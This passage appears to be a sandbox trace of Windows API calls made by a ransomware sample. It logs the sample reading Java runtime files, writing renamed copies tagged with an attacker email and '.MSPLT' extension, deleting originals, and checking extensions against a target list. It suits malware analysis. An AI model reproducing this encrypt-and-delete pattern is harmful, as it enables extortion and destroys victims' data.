SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.556] SetEndOfFile (hFile=0x470) returned 1 [0308.622] CloseHandle (hObject=0x470) returned 1 [0308.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0309.486] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf")) returned 1 [0310.627] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.627] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.627] lstrlenW (lpString=".doc") returned 4 [0310.627] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString=".docx") returned 5 [0310.627] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0310.627] lstrlenW (lpString=".pdf") returned 4 [0310.627] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString=".xls") returned 4 [0310.627] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0310.627] lstrlenW (lpString=".xlsx") returned 5 [0310.627] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0310.627] lstrlenW (lpString=".ppt") returned 4 [0310.627] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.627] lstrlenW (lpString=".zip") returned 4 [0310.627] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0310.627] lstrlenW (lpString=".rar") returned 4 [0310.627] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString=".bz2") returned 4 [0310.627] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString=".7z") returned 3 [0310.627] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0310.627] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.627] lstrlenW (lpString=".dbf") returned 4 [0310.627] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0310.627] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.628] lstrlenW (lpString=".1cd") returned 4 [0310.628] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.628] lstrlenW (lpString=".jpg") returned 4 [0310.628] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.628] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.628] lstrlenW (lpString=".doc") returned 4 [0310.628] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString=".docx") returned 5 [0310.628] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0310.628] lstrlenW (lpString=".pdf") returned 4 [0310.628] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString=".xls") returned 4 [0310.628] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0310.628] lstrlenW (lpString=".xlsx") returned 5 [0310.628] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0310.628] lstrlenW (lpString=".ppt") returned 4 [0310.628] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.628] lstrlenW (lpString=".zip") returned 4 [0310.628] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0310.628] lstrlenW (lpString=".rar") returned 4 [0310.628] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0310.628] lstrlenW (lpString=".bz2") returned 4 [0310.628] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0310.629] lstrlenW (lpString=".7z") returned 3 [0310.629] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0310.629] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.629] lstrlenW (lpString=".dbf") returned 4 [0310.629] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0310.629] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.629] lstrlenW (lpString=".1cd") returned 4 [0310.629] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0310.629] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 66 [0310.629] lstrlenW (lpString=".jpg") returned 4 [0310.629] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0310.629] lstrcmpiW (lpString1=".jfc", lpString2=".MSPLT") returned -1 [0310.629] lstrlenW (lpString="profile.jfc") returned 11 [0310.629] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.838] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=20065) returned 1 [0310.838] CloseHandle (hObject=0x524) returned 1 [0310.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc")) returned 0x20 [0310.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.882] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0310.882] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.882] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.882] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0310.884] GetLastError () returned 0x0 [0310.884] ReadFile (in: hFile=0x548, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x4e61, lpOverlapped=0x0) returned 1 [0311.938] WriteFile (in: hFile=0x54c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x4e70, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x4e70, lpOverlapped=0x0) returned 1 [0312.115] ReadFile (in: hFile=0x548, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.120] WriteFile (in: hFile=0x54c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xea, lpOverlapped=0x0) returned 1 [0312.120] SetEndOfFile (hFile=0x54c) returned 1 [0312.120] CloseHandle (hObject=0x54c) returned 1 [0312.124] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.124] SetEndOfFile (hFile=0x548) returned 1 [0312.129] CloseHandle (hObject=0x548) returned 1 [0312.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0312.130] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc")) returned 1 [0312.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.154] lstrlenW (lpString=".doc") returned 4 [0312.154] lstrcmpiW (lpString1=".doc", lpString2=".jfc") returned -1 [0312.154] lstrlenW (lpString=".docx") returned 5 [0312.154] lstrcmpiW (lpString1=".docx", lpString2="e.jfc") returned -1 [0312.154] lstrlenW (lpString=".pdf") returned 4 [0312.154] lstrcmpiW (lpString1=".pdf", lpString2=".jfc") returned 1 [0312.154] lstrlenW (lpString=".xls") returned 4 [0312.154] lstrcmpiW (lpString1=".xls", lpString2=".jfc") returned 1 [0312.154] lstrlenW (lpString=".xlsx") returned 5 [0312.154] lstrcmpiW (lpString1=".xlsx", lpString2="e.jfc") returned -1 [0312.154] lstrlenW (lpString=".ppt") returned 4 [0312.154] lstrcmpiW (lpString1=".ppt", lpString2=".jfc") returned 1 [0312.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.154] lstrlenW (lpString=".zip") returned 4 [0312.154] lstrcmpiW (lpString1=".zip", lpString2=".jfc") returned 1 [0312.154] lstrlenW (lpString=".rar") returned 4 [0312.154] lstrcmpiW (lpString1=".rar", lpString2=".jfc") returned 1 [0312.154] lstrlenW (lpString=".bz2") returned 4 [0312.154] lstrcmpiW (lpString1=".bz2", lpString2=".jfc") returned -1 [0312.155] lstrlenW (lpString=".7z") returned 3 [0312.155] lstrcmpiW (lpString1=".7z", lpString2="jfc") returned -1 [0312.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.155] lstrlenW (lpString=".dbf") returned 4 [0312.155] lstrcmpiW (lpString1=".dbf", lpString2=".jfc") returned -1 [0312.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.155] lstrlenW (lpString=".1cd") returned 4 [0312.155] lstrcmpiW (lpString1=".1cd", lpString2=".jfc") returned -1 [0312.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.155] lstrlenW (lpString=".jpg") returned 4 [0312.155] lstrcmpiW (lpString1=".jpg", lpString2=".jfc") returned 1 [0312.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.155] lstrlenW (lpString=".doc") returned 4 [0312.155] lstrcmpiW (lpString1=".doc", lpString2=".jfc") returned -1 [0312.155] lstrlenW (lpString=".docx") returned 5 [0312.155] lstrcmpiW (lpString1=".docx", lpString2="e.jfc") returned -1 [0312.155] lstrlenW (lpString=".pdf") returned 4 [0312.155] lstrcmpiW (lpString1=".pdf", lpString2=".jfc") returned 1 [0312.155] lstrlenW (lpString=".xls") returned 4 [0312.155] lstrcmpiW (lpString1=".xls", lpString2=".jfc") returned 1 [0312.155] lstrlenW (lpString=".xlsx") returned 5 [0312.155] lstrcmpiW (lpString1=".xlsx", lpString2="e.jfc") returned -1 [0312.155] lstrlenW (lpString=".ppt") returned 4 [0312.156] lstrcmpiW (lpString1=".ppt", lpString2=".jfc") returned 1 [0312.156] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.156] lstrlenW (lpString=".zip") returned 4 [0312.156] lstrcmpiW (lpString1=".zip", lpString2=".jfc") returned 1 [0312.156] lstrlenW (lpString=".rar") returned 4 [0312.156] lstrcmpiW (lpString1=".rar", lpString2=".jfc") returned 1 [0312.156] lstrlenW (lpString=".bz2") returned 4 [0312.159] lstrcmpiW (lpString1=".bz2", lpString2=".jfc") returned -1 [0312.159] lstrlenW (lpString=".7z") returned 3 [0312.159] lstrcmpiW (lpString1=".7z", lpString2="jfc") returned -1 [0312.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.159] lstrlenW (lpString=".dbf") returned 4 [0312.159] lstrcmpiW (lpString1=".dbf", lpString2=".jfc") returned -1 [0312.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.159] lstrlenW (lpString=".1cd") returned 4 [0312.159] lstrcmpiW (lpString1=".1cd", lpString2=".jfc") returned -1 [0312.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 54 [0312.159] lstrlenW (lpString=".jpg") returned 4 [0312.160] lstrcmpiW (lpString1=".jpg", lpString2=".jfc") returned 1 [0312.160] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0312.160] lstrlenW (lpString="logging.properties") returned 18 [0312.160] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0312.166] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=2455) returned 1 [0312.166] CloseHandle (hObject=0x548) returned 1 [0312.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties")) returned 0x20 [0312.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.166] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0312.167] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.167] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.167] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0312.168] GetLastError () returned 0x0 [0312.168] ReadFile (in: hFile=0x548, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x997, lpOverlapped=0x0) returned 1 [0312.170] WriteFile (in: hFile=0x54c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x9a0, lpOverlapped=0x0) returned 1 [0312.172] ReadFile (in: hFile=0x548, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.172] WriteFile (in: hFile=0x54c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xf8, lpOverlapped=0x0) returned 1 [0312.172] SetEndOfFile (hFile=0x54c) returned 1 [0312.172] CloseHandle (hObject=0x54c) returned 1 [0312.176] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.176] SetEndOfFile (hFile=0x548) returned 1 [0312.770] CloseHandle (hObject=0x548) returned 1 [0312.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0312.780] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties")) returned 1 [0312.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.782] lstrlenW (lpString=".doc") returned 4 [0312.782] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0312.782] lstrlenW (lpString=".docx") returned 5 [0312.782] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0312.782] lstrlenW (lpString=".pdf") returned 4 [0312.782] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0312.782] lstrlenW (lpString=".xls") returned 4 [0312.782] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0312.782] lstrlenW (lpString=".xlsx") returned 5 [0312.782] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0312.782] lstrlenW (lpString=".ppt") returned 4 [0312.782] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0312.782] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString=".zip") returned 4 [0312.783] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString=".rar") returned 4 [0312.783] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString=".bz2") returned 4 [0312.783] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString=".7z") returned 3 [0312.783] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0312.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString=".dbf") returned 4 [0312.783] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString=".1cd") returned 4 [0312.783] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString=".jpg") returned 4 [0312.783] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.783] lstrlenW (lpString=".doc") returned 4 [0312.783] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0312.783] lstrlenW (lpString=".docx") returned 5 [0312.784] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0312.784] lstrlenW (lpString=".pdf") returned 4 [0312.784] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString=".xls") returned 4 [0312.784] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString=".xlsx") returned 5 [0312.784] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0312.784] lstrlenW (lpString=".ppt") returned 4 [0312.784] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.784] lstrlenW (lpString=".zip") returned 4 [0312.784] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString=".rar") returned 4 [0312.784] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString=".bz2") returned 4 [0312.784] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString=".7z") returned 3 [0312.784] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0312.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.784] lstrlenW (lpString=".dbf") returned 4 [0312.784] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.784] lstrlenW (lpString=".1cd") returned 4 [0312.784] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0312.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 57 [0312.784] lstrlenW (lpString=".jpg") returned 4 [0312.784] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0312.785] lstrcmpiW (lpString1=".access", lpString2=".MSPLT") returned -1 [0312.785] lstrlenW (lpString="jmxremote.access") returned 16 [0312.785] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0312.837] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3998) returned 1 [0312.837] CloseHandle (hObject=0x540) returned 1 [0312.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access")) returned 0x20 [0312.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.837] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0312.838] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.838] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.838] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.372] GetLastError () returned 0x0 [0314.372] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xf9e, lpOverlapped=0x0) returned 1 [0314.374] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfa0, lpOverlapped=0x0) returned 1 [0314.376] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.376] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xf4, lpOverlapped=0x0) returned 1 [0314.377] SetEndOfFile (hFile=0x420) returned 1 [0314.377] CloseHandle (hObject=0x420) returned 1 [0314.377] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.377] SetEndOfFile (hFile=0x540) returned 1 [0314.382] CloseHandle (hObject=0x540) returned 1 [0314.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.383] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access")) returned 1 [0314.384] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.384] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.384] lstrlenW (lpString=".doc") returned 4 [0314.384] lstrcmpiW (lpString1=".doc", lpString2="cess") returned -1 [0314.384] lstrlenW (lpString=".docx") returned 5 [0314.385] lstrcmpiW (lpString1=".docx", lpString2="ccess") returned -1 [0314.385] lstrlenW (lpString=".pdf") returned 4 [0314.385] lstrcmpiW (lpString1=".pdf", lpString2="cess") returned -1 [0314.385] lstrlenW (lpString=".xls") returned 4 [0314.385] lstrcmpiW (lpString1=".xls", lpString2="cess") returned 